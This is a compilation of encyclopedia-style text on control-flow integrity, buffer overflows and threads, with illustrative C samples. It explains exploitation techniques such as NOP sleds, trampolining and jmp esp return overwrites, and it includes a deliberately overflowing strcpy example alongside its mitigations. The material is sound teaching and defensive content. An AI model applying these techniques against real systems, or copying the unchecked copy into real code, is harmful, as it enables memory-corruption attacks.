On a RET, the processor checks if the return address stored in the normal stack and shadow stack are equal. If the addresses are not equal, the processor generates an INT #21 (Control Flow Protection Fault). Indirect branch tracking detects indirect JMP or CALL instructions to unauthorized targets. It is implemented by adding a new internal state machine in the processor. The behavior of indirect JMP and CALL instructions is changed so that they switch the state machine from IDLE to WAIT_FOR_ENDBRANCH. In the WAIT_FOR_ENDBRANCH state, the next instruction to be executed is required to be the new ENDBRANCH instruction (ENDBR32 in 32-bit mode or ENDBR64 in 64-bit mode), which changes the internal state machine from WAIT_FOR_ENDBRANCH back to IDLE. Thus every authorized target of an indirect JMP or CALL must begin with ENDBRANCH. If the processor is in a WAIT_FOR_ENDBRANCH state (meaning, the previous instruction was an indirect JMP or CALL), and the next instruction is not an ENDBRANCH instruction, the processor generates an INT #21 (Control Flow Protection Fault). On processors not supporting CET indirect branch tracking, ENDBRANCH instructions are interpreted as NOPs and have no effect. Control Flow Guard (CFG) was first released forWindows 8.1Update 3 (KB3000850) in November 2014. Developers can add CFG to their programs by adding the/guard:cflinker flag before program linking in Visual Studio 2015 or newer.[20] As ofWindows 10 Creators Update(Windows 10 version 1703), the Windows kernel is compiled with CFG.[21]The Windows kernel usesHyper-Vto prevent malicious kernel code from overwriting the CFG bitmap.[22] CFG operates by creating a per-processbitmap, where a set bit indicates that the address is a valid destination. Before performing each indirect function call, the application checks if the destination address is in the bitmap. If the destination address is not in the bitmap, the program terminates.[20]This makes it more difficult for an attacker to exploit ause-after-freeby replacing an object's contents and then using an indirect function call to execute a payload.[23] For all protected indirect function calls, the_guard_check_icallfunction is called, which performs the following steps:[24] There are several generic techniques for bypassing CFG: eXtended Flow Guard (XFG) has not been officially released yet, but is available in the Windows Insider preview and was publicly presented at Bluehat Shanghai in 2019.[29] XFG extends CFG by validating function call signatures to ensure that indirect function calls are only to the subset of functions with the same signature. Function call signature validation is implemented by adding instructions to store the target function's hash in register r10 immediately prior to the indirect call and storing the calculated function hash in the memory immediately preceding the target address's code. When the indirect call is made, the XFG validation function compares the value in r10 to the target function's stored hash.[30][31]
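Application code does not normally write these checks by hand; they are inserted by the compiler or enforced by hardware as described above. The idea behind a fine-grained forward-edge check can nevertheless be sketched in plain C as an analogy: before an indirect call, the target is compared against the set of functions that are legitimate targets for that call site. The function names and allow-list below are hypothetical and only loosely mirror what Clang CFI, CFG, or XFG actually generate.

#include <stdio.h>
#include <stdlib.h>

typedef int (*handler_fn)(int);   /* the one function type expected at this call site */

static int double_it(int x) { return 2 * x; }
static int negate_it(int x) { return -x; }
static int not_allowed(int x) { return x + 1; }   /* same type, but not a legitimate target here */

/* Allow-list of legitimate forward-edge targets, analogous to the metadata a
   CFI-instrumented binary carries for this call site. */
static const handler_fn valid_targets[] = { double_it, negate_it };

static int guarded_call(handler_fn fn, int arg) {
    for (size_t i = 0; i < sizeof valid_targets / sizeof valid_targets[0]; i++)
        if (fn == valid_targets[i])
            return fn(arg);       /* approved target: perform the indirect call */
    /* A hijacked or forged pointer fails the check and the program is terminated,
       much as a CFI violation aborts the process. */
    fprintf(stderr, "forward-edge check failed\n");
    abort();
}

int main(void) {
    handler_fn h = double_it;     /* imagine this pointer lives in attacker-writable memory */
    printf("%d\n", guarded_call(h, 21));   /* prints 42 */

    h = not_allowed;              /* an overwritten pointer... */
    guarded_call(h, 21);          /* ...is rejected instead of being called */
    return 0;
}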
https://en.wikipedia.org/wiki/Control-flow_integrity
Inprogrammingandinformation security, abuffer overfloworbuffer overrunis ananomalywhereby aprogramwritesdatato abufferbeyond the buffer'sallocated memory, overwriting adjacentmemorylocations. Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs. Buffer overflows can often be triggered by malformed inputs; if one assumes all inputs will be smaller than a certain size and the buffer is created to be that size, then an anomalous transaction that produces more data could cause it to write past the end of the buffer. If this overwrites adjacent data or executable code, this may result in erratic program behavior, includingmemory access errors, incorrect results, andcrashes. Exploiting the behavior of a buffer overflow is a well-knownsecurity exploit. On many systems, the memory layout of a program, or the system as a whole, is well defined. By sending in data designed to cause a buffer overflow, it is possible to write into areas known to holdexecutable codeand replace it withmalicious code, or to selectively overwrite data pertaining to the program's state, therefore causing behavior that was not intended by the original programmer. Buffers are widespread inoperating system(OS) code, so it is possible to make attacks that performprivilege escalationand gain unlimited access to the computer's resources. The famedMorris wormin 1988 used this as one of its attack techniques. Programming languagescommonly associated with buffer overflows includeCandC++, which provide no built-in protection against accessing or overwriting data in any part of memory and do not automatically check that data written to anarray(the built-in buffer type) is within the boundaries of that array.Bounds checkingcan prevent buffer overflows, but requires additional code and processing time. Modern operating systems use a variety of techniques to combat malicious buffer overflows, notably byrandomizing the layout of memory, or deliberately leaving space between buffers and looking for actions that write into those areas ("canaries"). A buffer overflow occurs whendatawritten to a buffer also corrupts data values inmemory addressesadjacent to the destination buffer due to insufficientbounds checking.[1]: 41This can occur when copying data from one buffer to another without first checking that the data fits within the destination buffer. In the following example expressed inC, a program has two variables which are adjacent in memory: an 8-byte-long string buffer, A, and a two-bytebig-endianinteger, B. Initially, A contains nothing but zero bytes, and B contains the number 1979. Now, the program attempts to store thenull-terminated string"excessive"withASCIIencoding in the A buffer. "excessive"is 9 characters long and encodes to 10 bytes including the null terminator, but A can take only 8 bytes. By failing to check the length of the string, it also overwrites the value of B: B's value has now been inadvertently replaced by a number formed from part of the character string. In this example "e" followed by a zero byte would become 25856. Writing data past the end of allocated memory can sometimes be detected by the operating system to generate asegmentation faulterror that terminates the process. 
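The program for the example described above is not reproduced in this text, so the following is a hedged reconstruction of the kind of code being discussed. Variable adjacency and byte order are compiler- and platform-dependent, and the overflowing copy is undefined behavior, so the exact outcome (including the 25856 value, which assumes the big-endian layout described above) is illustrative only.

#include <stdio.h>
#include <string.h>

int main(void) {
    char A[8] = "";            /* 8-byte string buffer, initially all zero bytes */
    unsigned short B = 1979;   /* two-byte integer assumed to sit just after A in memory */

    /* "excessive" needs 10 bytes including the null terminator, but A holds only 8.
       The unchecked copy writes past the end of A and, on the layout described in
       the text, overwrites B with bytes of the string. */
    strcpy(A, "excessive");

    printf("B = %hu\n", B);    /* the text's big-endian example yields 25856 */

    /* The fix discussed in the next paragraph bounds the copy to A's capacity:
       strlcpy(A, "excessive", sizeof(A));
       (strlcpy is a BSD extension, also provided by newer glibc and by libbsd.) */
    return 0;
}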
To prevent the buffer overflow from happening in this example, the call tostrcpycould be replaced withstrlcpy, which takes the maximum capacity of A (including a null-termination character) as an additional parameter and ensures that no more than this amount of data is written to A: When available, thestrlcpylibrary function is preferred overstrncpywhich does not null-terminate the destination buffer if the source string's length is greater than or equal to the size of the buffer (the third argument passed to the function). ThereforeAmay not be null-terminated and cannot be treated as a valid C-style string. The techniques toexploita buffer overflow vulnerability vary byarchitecture,operating system, and memory region. For example, exploitation on theheap(used for dynamically allocated memory), differs markedly from exploitation on thecall stack. In general, heap exploitation depends on the heap manager used on the target system, while stack exploitation depends on the calling convention used by the architecture and compiler. There are several ways in which one can manipulate a program by exploiting stack-based buffer overflows: The attacker designs data to cause one of these exploits, then places this data in a buffer supplied to users by the vulnerable code. If the address of the user-supplied data used to affect the stack buffer overflow is unpredictable, exploiting a stack buffer overflow to cause remote code execution becomes much more difficult. One technique that can be used to exploit such a buffer overflow is called "trampolining". Here, an attacker will find a pointer to the vulnerable stack buffer and compute the location of theirshellcoderelative to that pointer. The attacker will then use the overwrite to jump to aninstructionalready in memory which will make a second jump, this time relative to the pointer. That second jump will branch execution into the shellcode. Suitable instructions are often present in large code. TheMetasploit Project, for example, maintains a database of suitable opcodes, though it lists only those found in theWindowsoperating system.[4] A buffer overflow occurring in the heap data area is referred to as a heap overflow and is exploitable in a manner different from that of stack-based overflows. Memory on the heap is dynamically allocated by the application at run-time and typically contains program data. Exploitation is performed by corrupting this data in specific ways to cause the application to overwrite internal structures such as linked list pointers. The canonical heap overflow technique overwrites dynamic memory allocation linkage (such asmallocmeta data) and uses the resulting pointer exchange to overwrite a program function pointer. Microsoft'sGDI+vulnerability in handlingJPEGsis an example of the danger a heap overflow can present.[5] Manipulation of the buffer, which occurs before it is read or executed, may lead to the failure of an exploitation attempt. These manipulations can mitigate the threat of exploitation, but may not make it impossible. Manipulations could include conversion to upper or lower case, removal ofmetacharactersand filtering out of non-alphanumericstrings. However, techniques exist to bypass these filters and manipulations, such asalphanumeric shellcode,polymorphic code,self-modifying code, andreturn-to-libc attacks. The same methods can be used to avoid detection byintrusion detection systems. 
In some cases, including where code is converted intoUnicode,[6]the threat of the vulnerability has been misrepresented by the disclosers as only Denial of Service when in fact the remote execution of arbitrary code is possible. In real-world exploits there are a variety of challenges which need to be overcome for exploits to operate reliably. These factors include null bytes in addresses, variability in the location of shellcode, differences between environments, and various counter-measures in operation. A NOP-sled is the oldest and most widely known technique for exploiting stack buffer overflows.[7]It solves the problem of finding the exact address of the buffer by effectively increasing the size of the target area. To do this, much larger sections of the stack are corrupted with theno-opmachine instruction. At the end of the attacker-supplied data, after the no-op instructions, the attacker places an instruction to perform a relative jump to the top of the buffer where theshellcodeis located. This collection of no-ops is referred to as the "NOP-sled" because if the return address is overwritten with any address within the no-op region of the buffer, the execution will "slide" down the no-ops until it is redirected to the actual malicious code by the jump at the end. This technique requires the attacker to guess where on the stack the NOP-sled is instead of the comparatively small shellcode.[8] Because of the popularity of this technique, many vendors ofintrusion prevention systemswill search for this pattern of no-op machine instructions in an attempt to detect shellcode in use. A NOP-sled does not necessarily contain only traditional no-op machine instructions. Any instruction that does not corrupt the machine state to a point where the shellcode will not run can be used in place of the hardware assisted no-op. As a result, it has become common practice for exploit writers to compose the no-op sled with randomly chosen instructions which will have no real effect on the shellcode execution.[9] While this method greatly improves the chances that an attack will be successful, it is not without problems. Exploits using this technique still must rely on some amount of luck that they will guess offsets on the stack that are within the NOP-sled region.[10]An incorrect guess will usually result in the target program crashing and could alert thesystem administratorto the attacker's activities. Another problem is that the NOP-sled requires a much larger amount of memory in which to hold a NOP-sled large enough to be of any use. This can be a problem when the allocated size of the affected buffer is too small and the current depth of the stack is shallow (i.e., there is not much space from the end of the current stack frame to the start of the stack). Despite its problems, the NOP-sled is often the only method that will work for a given platform, environment, or situation, and as such it is still an important technique. The "jump to register" technique allows for reliable exploitation of stack buffer overflows without the need for extra room for a NOP-sled and without having to guess stack offsets. The strategy is to overwrite the return pointer with something that will cause the program to jump to a known pointer stored within a register which points to the controlled buffer and thus the shellcode. 
For example, if register A contains a pointer to the start of a buffer, then any jump or call taking that register as an operand can be used to gain control of the flow of execution.[11] In practice a program may not intentionally contain instructions to jump to a particular register. The traditional solution is to find an unintentional instance of a suitable opcode at a fixed location somewhere within the program memory. A classic example is an unintentional instance of the i386 jmp esp instruction, whose opcode is FF E4.[12] This two-byte sequence can be found at a one-byte offset from the start of the instruction call DbgPrint at address 0x7C941EED. If an attacker overwrites the program return address with this address, the program will first jump to 0x7C941EED, interpret the opcode FF E4 as the jmp esp instruction, and will then jump to the top of the stack and execute the attacker's code.[13] When this technique is possible the severity of the vulnerability increases considerably. This is because exploitation will work reliably enough to automate an attack with a virtual guarantee of success when it is run. For this reason, this is the technique most commonly used in Internet worms that exploit stack buffer overflow vulnerabilities.[14] This method also allows shellcode to be placed after the overwritten return address on the Windows platform. Since executables are mostly based at address 0x00400000 and x86 is a little-endian architecture, the last byte of the return address must be a null, which terminates the buffer copy, and nothing is written beyond that. This limits the size of the shellcode to the size of the buffer, which may be overly restrictive. DLLs are located in high memory (above 0x01000000) and so have addresses containing no null bytes, so this method can remove null bytes (or other disallowed characters) from the overwritten return address. Used in this way, the method is often referred to as "DLL trampolining". Various techniques have been used to detect or prevent buffer overflows, with various tradeoffs. The following sections describe the choices and implementations available. Assembly, C, and C++ are popular programming languages that are vulnerable to buffer overflow in part because they allow direct access to memory and are not strongly typed.[15] C provides no built-in protection against accessing or overwriting data in any part of memory. More specifically, it does not check that data written to a buffer is within the boundaries of that buffer. The standard C++ libraries provide many ways of safely buffering data, and C++'s Standard Template Library (STL) provides containers that can optionally perform bounds checking if the programmer explicitly calls for checks while accessing data. For example, a vector's member function at() performs a bounds check and throws an out_of_range exception if the bounds check fails.[16] However, C++ behaves just like C if the bounds check is not explicitly called. Techniques to avoid buffer overflows also exist for C. Languages that are strongly typed and do not allow direct memory access, such as COBOL, Java, Eiffel, Python, and others, prevent buffer overflow in most cases.[15] Many programming languages other than C or C++ provide runtime checking and in some cases even compile-time checking which might send a warning or raise an exception, while C or C++ would overwrite data and continue to execute instructions until erroneous results are obtained, potentially causing the program to crash. 
Examples of such languages includeAda,Eiffel,Lisp,Modula-2,Smalltalk,OCamland such C-derivatives asCyclone,RustandD. TheJavaand.NET Frameworkbytecode environments also require bounds checking on all arrays. Nearly everyinterpreted languagewill protect against buffer overflow, signaling a well-defined error condition. Languages that provide enough type information to do bounds checking often provide an option to enable or disable it.Static code analysiscan remove many dynamic bound and type checks, but poor implementations and awkward cases can significantly decrease performance. Software engineers should carefully consider the tradeoffs of safety versus performance costs when deciding which language and compiler setting to use. The problem of buffer overflows is common in the C and C++ languages because they expose low level representational details of buffers as containers for data types. Buffer overflows can be avoided by maintaining a high degree of correctness in code that performs buffer management. It has also long been recommended to avoid standard library functions that are not bounds checked, such asgets,scanfandstrcpy. TheMorris wormexploited agetscall infingerd.[17] Well-written and tested abstract data type libraries that centralize and automatically perform buffer management, including bounds checking, can reduce the occurrence and impact of buffer overflows. The primary data types in languages in which buffer overflows are common are strings and arrays. Thus, libraries preventing buffer overflows in these data types can provide the vast majority of the necessary coverage. However, failure to use these safe libraries correctly can result in buffer overflows and other vulnerabilities, and naturally anybugin the library is also a potential vulnerability. "Safe" library implementations include "The Better String Library",[18]Vstr[19]and Erwin.[20]TheOpenBSDoperating system'sC libraryprovides thestrlcpyandstrlcatfunctions, but these are more limited than full safe library implementations. In September 2007, Technical Report 24731, prepared by the C standards committee, was published.[21]It specifies a set of functions that are based on the standard C library's string and IO functions, with additional buffer-size parameters. However, the efficacy of these functions for reducing buffer overflows is disputable. They require programmer intervention on a per function call basis that is equivalent to intervention that could make the analogous older standard library functions buffer overflow safe.[22] Buffer overflow protection is used to detect the most common buffer overflows by checking that thestackhas not been altered when a function returns. If it has been altered, the program exits with asegmentation fault. Three such systems are Libsafe,[23]and theStackGuard[24]andProPolice[25]gccpatches. Microsoft's implementation ofData Execution Prevention(DEP) mode explicitly protects the pointer to theStructured Exception Handler(SEH) from being overwritten.[26] Stronger stack protection is possible by splitting the stack in two: one for data and one for function returns. This split is present in theForth language, though it was not a security-based design decision. Regardless, this is not a complete solution to buffer overflows, as sensitive data other than the return address may still be overwritten. This type of protection is also not entirely accurate because it does not detect all attacks. 
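Conceptually, canary-based protection of the kind just described works roughly as in the following hand-written sketch; real compilers (for example gcc with -fstack-protector, which implements the StackGuard/ProPolice approach) insert an equivalent check automatically and use a randomized per-process guard value rather than the fixed placeholder shown here.

/* Conceptual sketch of a stack canary check; the value and layout are illustrative. */
#include <stdio.h>
#include <stdlib.h>

static unsigned long canary_secret = 0xdeadc0deUL;     /* illustrative, not random */

void guarded_function(const char *input) {
    unsigned long canary = canary_secret;  /* conceptually sits between the locals
                                              and the saved return address */
    char buf[16];

    /* A linear overflow of buf would have to overwrite 'canary' on its way to
       the saved return address. (The copy here is done safely.) */
    snprintf(buf, sizeof buf, "%s", input);
    printf("%s\n", buf);

    if (canary != canary_secret) {         /* checked just before returning */
        fprintf(stderr, "*** stack smashing detected ***\n");
        abort();
    }
}

int main(void) {
    guarded_function("hello");
    return 0;
}

If a linear overflow reaches toward the saved return address, it must first overwrite the guard value, and the mismatch is detected before the function returns.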
Systems like StackGuard are more centered around the behavior of the attacks, which makes them efficient and faster in comparison to range-check systems.[27] Buffer overflows work by manipulatingpointers, including stored addresses. PointGuard was proposed as a compiler-extension to prevent attackers from reliably manipulating pointers and addresses.[28]The approach works by having the compiler add code to automatically XOR-encode pointers before and after they are used. Theoretically, because the attacker does not know what value will be used to encode and decode the pointer, one cannot predict what the pointer will point to if it is overwritten with a new value. PointGuard was never released, but Microsoft implemented a similar approach beginning inWindows XPSP2 andWindows Server 2003SP1.[29]Rather than implement pointer protection as an automatic feature, Microsoft added an API routine that can be called. This allows for better performance (because it is not used all of the time), but places the burden on the programmer to know when its use is necessary. Because XOR is linear, an attacker may be able to manipulate an encoded pointer by overwriting only the lower bytes of an address. This can allow an attack to succeed if the attacker can attempt the exploit multiple times or complete an attack by causing a pointer to point to one of several locations (such as any location within a NOP sled).[30]Microsoft added a random rotation to their encoding scheme to address this susceptibility to partial overwrites.[31] Executable space protection is an approach to buffer overflow protection that prevents execution of code on the stack or the heap. An attacker may use buffer overflows to insert arbitrary code into the memory of a program, but with executable space protection, any attempt to execute that code will cause an exception. Some CPUs support a feature calledNX("No eXecute") orXD("eXecute Disabled") bit, which in conjunction with software, can be used to markpages of data(such as those containing the stack and the heap) as readable and writable but not executable. Some Unix operating systems (e.g.OpenBSD,macOS) ship with executable space protection (e.g.W^X), and optional packages that provide it exist for others. Newer variants of Microsoft Windows also support executable space protection, calledData Execution Prevention.[35]Proprietary add-ons that provide similar protection are also available. Executable space protection does not generally protect againstreturn-to-libc attacks, or any other attack that does not rely on the execution of the attacker's code. However, on64-bitsystems usingASLR, as described below, executable space protection makes it far more difficult to execute such attacks. CHERI (Capability Hardware Enhanced RISC Instructions) is a computer processor technology designed to improve security. It operates at a hardware level by providing a hardware-enforced type (a CHERI capability) that authorises access to memory. Traditional pointers are replaced by addresses accompanied by metadata that limit what can be accessed through any given pointer. Address space layout randomization (ASLR) is a computer security feature that involves arranging the positions of key data areas, usually including the base of the executable and position of libraries, heap, and stack, randomly in a process' address space. Randomization of thevirtual memoryaddresses at which functions and variables can be found can make exploitation of a buffer overflow more difficult, but not impossible. 
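The effect of ASLR can be observed with a few lines of code: the sketch below prints the address of a code symbol, a stack variable, and a heap allocation, and on a system with ASLR (and a position-independent executable, for the code address) the printed values change from run to run.

/* Prints the addresses of a code symbol, a stack variable and a heap block.
   Under ASLR (and a PIE build for the code address) the values differ per run. */
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    int on_stack = 0;
    void *on_heap = malloc(16);

    printf("code  : %p\n", (void *)&main);   /* cast is accepted on common platforms */
    printf("stack : %p\n", (void *)&on_stack);
    printf("heap  : %p\n", on_heap);

    free(on_heap);
    return 0;
}

The randomization itself is applied by the kernel and loader each time the program starts.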
It also forces the attacker to tailor the exploitation attempt to the individual system, which foils the attempts ofinternet worms.[38]A similar but less effective method is torebaseprocesses and libraries in the virtual address space. The use of deep packet inspection (DPI) can detect, at the network perimeter, very basic remote attempts to exploit buffer overflows by use of attack signatures andheuristics. This technique can block packets that have the signature of a known attack. It was formerly used in situations in which a long series of No-Operation instructions (known as a NOP-sled) was detected and the location of the exploit'spayloadwas slightly variable. Packet scanning is not an effective method since it can only prevent known attacks and there are many ways that a NOP-sled can be encoded.Shellcodeused by attackers can be madealphanumeric,metamorphic, orself-modifyingto evade detection by heuristic packet scanners andintrusion detection systems. Checking for buffer overflows and patching the bugs that cause them helps prevent buffer overflows. One common automated technique for discovering them isfuzzing.[39]Edge case testing can also uncover buffer overflows, as can static analysis.[40]Once a potential buffer overflow is detected it should be patched. This makes the testing approach useful for software that is in development, but less useful for legacy software that is no longer maintained or supported. Buffer overflows were understood and partially publicly documented as early as 1972, when the Computer Security Technology Planning Study laid out the technique: "The code performing this function does not check the source and destination addresses properly, permitting portions of the monitor to be overlaid by the user. This can be used to inject code into the monitor that will permit the user to seize control of the machine."[41]Today, the monitor would be referred to as the kernel. The earliest documented hostile exploitation of a buffer overflow was in 1988. It was one of several exploits used by theMorris wormto propagate itself over the Internet. The program exploited was aserviceonUnixcalledfinger.[42]Later, in 1995, Thomas Lopatic independently rediscovered the buffer overflow and published his findings on theBugtraqsecurity mailing list.[43]A year later, in 1996,Elias Levy(also known as Aleph One) published inPhrackmagazine the paper "Smashing the Stack for Fun and Profit",[44]a step-by-step introduction to exploiting stack-based buffer overflow vulnerabilities. Since then, at least two major internet worms have exploited buffer overflows to compromise a large number of systems. In 2001, theCode Red wormexploited a buffer overflow in Microsoft'sInternet Information Services(IIS) 5.0[45]and in 2003 theSQL Slammerworm compromised machines runningMicrosoft SQL Server 2000.[46] In 2003, buffer overflows present in licensedXboxgames were exploited to allow unlicensed software, includinghomebrew games, to run on the console without the need for hardware modifications, known asmodchips.[47]ThePS2 Independence Exploitalso used a buffer overflow to achieve the same for thePlayStation 2. The Twilight hack accomplished the same with theWii, using a buffer overflow inThe Legend of Zelda: Twilight Princess.
https://en.wikipedia.org/wiki/Buffer_overflow
Incomputer science, athreadofexecutionis the smallest sequence of programmed instructions that can be managed independently by ascheduler, which is typically a part of theoperating system.[1]In many cases, a thread is a component of aprocess. The multiple threads of a given process may be executedconcurrently(via multithreading capabilities), sharing resources such asmemory, while different processes do not share these resources. In particular, the threads of a process share its executable code and the values of itsdynamically allocatedvariables and non-thread-localglobal variablesat any given time. The implementation of threads andprocessesdiffers between operating systems.[2][page needed] Threads made an early appearance under the name of "tasks" in IBM's batch processing operating system, OS/360, in 1967. It provided users with three available configurations of theOS/360control system, of whichMultiprogramming with a Variable Number of Tasks(MVT) was one. Saltzer (1966) creditsVictor A. Vyssotskywith the term "thread".[3] The use of threads in software applications became more common in the early 2000s as CPUs began to utilize multiple cores. Applications wishing to take advantage of multiple cores for performance advantages were required to employ concurrency to utilize the multiple cores.[4] Scheduling can be done at the kernel level or user level, and multitasking can be donepreemptivelyorcooperatively. This yields a variety of related concepts. At the kernel level, aprocesscontains one or morekernel threads, which share the process's resources, such as memory and file handles – a process is a unit of resources, while a thread is a unit of scheduling and execution. Kernel scheduling is typically uniformly done preemptively or, less commonly, cooperatively. At the user level a process such as aruntime systemcan itself schedule multiple threads of execution. If these do not share data, as in Erlang, they are usually analogously called processes,[5]while if they share data they are usually called(user) threads, particularly if preemptively scheduled. Cooperatively scheduled user threads are known asfibers; different processes may schedule user threads differently. User threads may be executed by kernel threads in various ways (one-to-one, many-to-one, many-to-many). The term "light-weight process" variously refers to user threads or to kernel mechanisms for scheduling user threads onto kernel threads. Aprocessis a "heavyweight" unit of kernel scheduling, as creating, destroying, and switching processes is relatively expensive. Processes ownresourcesallocated by the operating system. Resources include memory (for both code and data),file handles, sockets, device handles, windows, and aprocess control block. Processes areisolatedbyprocess isolation, and do not share address spaces or file resources except through explicit methods such as inheriting file handles or shared memory segments, or mapping the same file in a shared way – seeinterprocess communication. Creating or destroying a process is relatively expensive, as resources must be acquired or released. Processes are typically preemptively multitasked, and process switching is relatively expensive, beyond basic cost ofcontext switching, due to issues such as cache flushing (in particular, process switching changes virtual memory addressing, causing invalidation and thus flushing of an untaggedtranslation lookaside buffer(TLB), notably on x86). Akernel threadis a "lightweight" unit of kernel scheduling. 
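A minimal sketch of the difference in resource sharing described above, using the POSIX fork and pthreads APIs (compile with -pthread on typical Unix toolchains): a forked child updates only its own copy of a variable, while a thread in the same process updates the shared original.

/* Sketch: a forked child gets its own copy of 'counter', while a thread in the
   same process updates the original. POSIX APIs (fork, pthreads) assumed. */
#include <pthread.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

static int counter = 0;

static void *thread_body(void *arg) {
    (void)arg;
    counter += 1;                 /* visible to the whole process */
    return NULL;
}

int main(void) {
    pid_t pid = fork();
    if (pid == 0) {               /* child process: private copy-on-write memory */
        counter += 100;           /* the parent never sees this */
        _exit(0);
    }
    waitpid(pid, NULL, 0);

    pthread_t t;
    pthread_create(&t, NULL, thread_body, NULL);
    pthread_join(t, NULL);

    printf("counter = %d\n", counter);   /* prints 1, not 101 */
    return 0;
}

On a 1:1 implementation such as Linux's NPTL, the thread created here is backed by a kernel thread, the lightweight scheduling unit described next.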
At least one kernel thread exists within each process. If multiple kernel threads exist within a process, then they share the same memory and file resources. Kernel threads are preemptively multitasked if the operating system's processscheduleris preemptive. Kernel threads do not own resources except for astack, a copy of theregistersincluding theprogram counter, andthread-local storage(if any), and are thus relatively cheap to create and destroy. Thread switching is also relatively cheap: it requires a context switch (saving and restoring registers and stack pointer), but does not change virtual memory and is thus cache-friendly (leaving TLB valid). The kernel can assign one or more software threads to each core in a CPU (it being able to assign itself multiple software threads depending on its support for multithreading), and can swap out threads that get blocked. However, kernel threads take much longer than user threads to be swapped. Threads are sometimes implemented inuserspacelibraries, thus calleduser threads. The kernel is unaware of them, so they are managed and scheduled in userspace. Some implementations base their user threads on top of several kernel threads, to benefit frommulti-processormachines (M:N model). User threads as implemented byvirtual machinesare also calledgreen threads. As user thread implementations are typically entirely in userspace, context switching between user threads within the same process is extremely efficient because it does not require any interaction with the kernel at all: a context switch can be performed by locally saving the CPU registers used by the currently executing user thread or fiber and then loading the registers required by the user thread or fiber to be executed. Since scheduling occurs in userspace, the scheduling policy can be more easily tailored to the requirements of the program's workload. However, the use of blocking system calls in user threads (as opposed to kernel threads) can be problematic. If a user thread or a fiber performs a system call that blocks, the other user threads and fibers in the process are unable to run until the system call returns. A typical example of this problem is when performing I/O: most programs are written to perform I/O synchronously. When an I/O operation is initiated, a system call is made, and does not return until the I/O operation has been completed. In the intervening period, the entire process is "blocked" by the kernel and cannot run, which starves other user threads and fibers in the same process from executing. A common solution to this problem (used, in particular, by many green threads implementations) is providing an I/O API that implements an interface that blocks the calling thread, rather than the entire process, by using non-blocking I/O internally, and scheduling another user thread or fiber while the I/O operation is in progress. Similar solutions can be provided for other blocking system calls. Alternatively, the program can be written to avoid the use of synchronous I/O or other blocking system calls (in particular, using non-blocking I/O, including lambda continuations and/or async/awaitprimitives[6]). Fibersare an even lighter unit of scheduling which arecooperatively scheduled: a running fiber must explicitly "yield" to allow another fiber to run, which makes their implementation much easier than kernel oruser threads. A fiber can be scheduled to run in any thread in the same process. 
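A fiber-style switch can be sketched with the POSIX ucontext API (obsolescent but still widely available); the two contexts below hand control back and forth at explicit yield points, with the application rather than the kernel scheduler deciding which of them runs next.

/* Two cooperatively scheduled "fibers" that explicitly yield to each other
   using the POSIX ucontext API. */
#include <stdio.h>
#include <ucontext.h>

static ucontext_t main_ctx, fiber_ctx;

static void fiber_body(void) {
    printf("fiber: step 1\n");
    swapcontext(&fiber_ctx, &main_ctx);   /* explicit yield back to main */
    printf("fiber: step 2\n");
    /* falling off the end resumes uc_link (main_ctx) */
}

int main(void) {
    static char stack[64 * 1024];         /* private stack for the fiber */

    getcontext(&fiber_ctx);
    fiber_ctx.uc_stack.ss_sp = stack;
    fiber_ctx.uc_stack.ss_size = sizeof stack;
    fiber_ctx.uc_link = &main_ctx;        /* where to continue when the fiber returns */
    makecontext(&fiber_ctx, fiber_body, 0);

    printf("main: starting fiber\n");
    swapcontext(&main_ctx, &fiber_ctx);   /* run fiber until it yields */
    printf("main: fiber yielded, resuming it\n");
    swapcontext(&main_ctx, &fiber_ctx);   /* run fiber to completion */
    printf("main: done\n");
    return 0;
}

Which context runs, and when, is decided entirely by the application code above.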
This permits applications to gain performance improvements by managing scheduling themselves, instead of relying on the kernel scheduler (which may not be tuned for the application). Some research implementations of theOpenMPparallel programming model implement their tasks through fibers.[7][8]Closely related to fibers arecoroutines, with the distinction being that coroutines are a language-level construct, while fibers are a system-level construct. Threads differ from traditionalmultitaskingoperating-systemprocessesin several ways. Systems such asWindows NTandOS/2are said to havecheapthreads andexpensiveprocesses; in other operating systems there is not so great a difference except in the cost of anaddress-spaceswitch, which on some architectures (notablyx86) results in atranslation lookaside buffer(TLB) flush. Threads and processes thus involve different tradeoffs. Operating systems schedule threads eitherpreemptivelyorcooperatively.Multi-user operating systemsgenerally favorpreemptive multithreadingfor its finer-grained control over execution time viacontext switching. However, preemptive scheduling may context-switch threads at moments unanticipated by programmers, thus causinglock convoy,priority inversion, or other side-effects. In contrast,cooperative multithreadingrelies on threads to relinquish control of execution, thus ensuring that threadsrun to completion. This can cause problems if a cooperatively multitasked threadblocksby waiting on aresourceor if itstarvesother threads by not yielding control of execution during intensive computation. Until the early 2000s, most desktop computers had only one single-core CPU, with no support forhardware threads, although threads were still used on such computers because switching between threads was generally still quicker than full-processcontext switches. In 2002,Inteladded support forsimultaneous multithreadingto thePentium 4processor, under the namehyper-threading; in 2005, they introduced the dual-corePentium Dprocessor andAMDintroduced the dual-coreAthlon 64 X2processor. Systems with a single processor generally implement multithreading bytime slicing: thecentral processing unit(CPU) switches between differentsoftware threads. Thiscontext switchingusually occurs frequently enough that users perceive the threads or tasks as running in parallel (for popular server/desktop operating systems, the maximum time slice of a thread, when other threads are waiting, is often limited to 100–200ms). On amultiprocessorormulti-coresystem, multiple threads can execute inparallel, with every processor or core executing a separate thread simultaneously; on a processor or core withhardware threads, separate software threads can also be executed concurrently by separate hardware threads. Threads created by the user in a 1:1 correspondence with schedulable entities in the kernel[9]are the simplest possible threading implementation.OS/2andWin32used this approach from the start, while onLinuxtheGNU C Libraryimplements this approach (via theNPTLor olderLinuxThreads). This approach is also used bySolaris,NetBSD,FreeBSD,macOS, andiOS. AnM:1 model implies that all application-level threads map to one kernel-level scheduled entity;[9]the kernel has no knowledge of the application threads. With this approach, context switching can be done very quickly and, in addition, it can be implemented even on simple kernels which do not support threading. 
